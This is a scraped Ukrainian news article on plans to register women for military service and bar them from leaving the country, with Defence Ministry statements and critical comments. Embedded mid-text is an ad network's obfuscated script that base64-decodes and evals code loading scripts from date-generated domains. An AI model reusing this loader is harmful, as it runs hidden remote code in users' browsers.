Військовий облік жінок та заборона виїзду за кордон з 1 жовтня : огляд думок, фейків та офіційних заяв

Останнім часом у мережі активно обговорюють військовий облік жінок, який планують запровадити в Україні.

Очікується, що з 1 жовтня українські жінки певних професій за спеціальностей мають стати на облік. Далі вони не зможуть залишати межі країни до кінця війни. Така ситуація обурює українців, більшість не згодні з тим. Особливо це стосується того факту, що законом не передбачена навіть відсрочка для тих, хто виховує меленьких дітей.

У Міноборони в свою чергу заспокоюють та зазначають, що зміни до законодавства будуть внесені. Також переглянуть перелік професій, представниці яких матимуть ставати на військовий облік.

Позиція Міноборони

Комітет Верховної Ради спільно з Міністерством оборони та Генштабом ЗСУ розробляє законопроєкт про постановку на військовий облік громадян України жіночої статі. У цьому випадку йдеться виключно про добровільні засади для вступу до лав військовозобов’язаних.

Саме на добровільних засадах наголошують в Міноборони.

Також повідомляють, що зараз держава не потребує стрімкого збільшення кількості армії. Проте, постанова на військовий облік й не означала, що відразу залучають до ЗСУ.

Після постанови на облік людина чекає своєї черги та отримує повідомлення про необхідність залучення до лав армії, коли це потрібно державі.

У разі ухвалення змін до згаданого закону Генштаб розробить зміни до переліку військово-облікових спеціальностей для жінок. Цей перелік буде суттєво скорочено.

Фейк

Напередодні активно розповсюджували інформацію з повним переліком професій, представниці яких мають стати на військовий облік. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Ганна Маляр на своїй сторінці в Фейсбуці спростувала інформацію:

Цікаву думку з цього приводу висловив запорізький активіст Олександ Ралик:

«Суть законопроекту полягає в тому, що жінки за затвердженим Міноборони списком спеціальностей повинні ставати на військовий облік, решта – за бажанням. Міноборони каже, що коли ухвалять законопроект, вони змінять список спеціальностей для жінок. Що заважає прямо зараз змінити його, щоб були зрозумілі та передбачувані правила – загадка природи.

Якщо врахувати, що у нас під час війни тотально не публікують НПА, які стосуються обмеження прав громадян, як це все працюватиме на практиці, навіть якщо все приймуть – загадка. Як прикордонники повинні відрізняти жінок, які підлягають обліку від тих, хто не підлягає? Наймовірніше, жінкам потрібно буде для виїзду відвідувати військкомат та отримувати довідку.

І так щодо заяви Ганни Маляр про фейки: я завжди думав, що держслужбовець повинен спиратися на чинне законодавство, а не на ініціативи, які не факт, що будуть прийняті».

Коментар юриста Міноборони

Юрист Міністерства оборони Володимир Смілка говорить: на військовозобов’язаних жінок розповсюджуються такі ж самі обмеження, що і на чоловіків. Зокрема, вони не можуть виїздити за кордон під час воєнного стану.

«Оскільки ми наближаємося до стандартів НАТО, ми ідемо до них не тільки у зброї, але і в обліку військовому. Цей облік однаковий як для жінок, так і для чоловіків. Вони збирають необхідні документи й звертаються до керівника свого підприємства, направляються у територіальні центри комплектування», — пояснив він. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/vijskovij-oblik-zhinok-ta-zaborona-viyizdu-za-kordon-z-1-zhovtnya-oglyad-dumok-fejkiv-ta-ofitsijnih-zayav/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top